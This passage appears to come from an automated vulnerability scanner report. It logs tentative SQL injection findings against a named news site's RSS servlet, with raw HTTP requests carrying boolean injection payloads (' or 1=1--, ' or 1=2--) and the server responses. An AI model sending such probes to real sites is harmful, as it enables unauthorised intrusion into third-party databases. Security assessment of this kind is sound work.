GET /mngi/rss/CustomRssServlet/568/200749.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:27 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200749.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:19:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:28 GMT
Content-Length: 13375
Connection: close
Set-Cookie: JSESSIONID=X5FMJQDGGCUWMCUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.23. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200750.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200750.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 65316758'%20or%201%3d1--%20 and 65316758'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56865316758'%20or%201%3d1--%20/200750.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/56865316758'%20or%201%3d2--%20/200750.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.24. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200753.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200753.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:27 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.25. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200753.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200753.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 47711278%20or%201%3d1--%20 and 47711278%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56847711278%20or%201%3d1--%20/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet/56847711278%20or%201%3d2--%20/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:31 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.26. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200754.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200754.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 87447082'%20or%201%3d1--%20 and 87447082'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi87447082'%20or%201%3d1--%20/rss/CustomRssServlet/568/200754.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi87447082'%20or%201%3d2--%20/rss/CustomRssServlet/568/200754.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:26 GMT
Date: Tue, 07 Dec 2010 23:19:26 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.27. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200756.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200756.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200756.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200756.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.28. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200757.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200757.xml

Issue detail

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:01 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:01 GMT
Date: Tue, 07 Dec 2010 23:21:01 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.29. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200757.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200757.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.30. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200759.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200759.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 24161260'%20or%201%3d1--%20 and 24161260'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet24161260'%20or%201%3d1--%20/568/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:59 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet24161260'%20or%201%3d2--%20/568/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.31. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200759.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200759.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 35561059%20or%201%3d1--%20 and 35561059%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56835561059%20or%201%3d1--%20/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56835561059%20or%201%3d2--%20/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.32. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200760.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200760.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 33757705'%20or%201%3d1--%20 and 33757705'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet33757705'%20or%201%3d1--%20/568/200760.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /mngi/rss/CustomRssServlet33757705'%20or%201%3d2--%20/568/200760.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.33. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200764.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200764.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 93704237'%20or%201%3d1--%20 and 93704237'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi93704237'%20or%201%3d1--%20/rss/CustomRssServlet/568/200764.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi93704237'%20or%201%3d2--%20/rss/CustomRssServlet/568/200764.xml HTTP/1.1
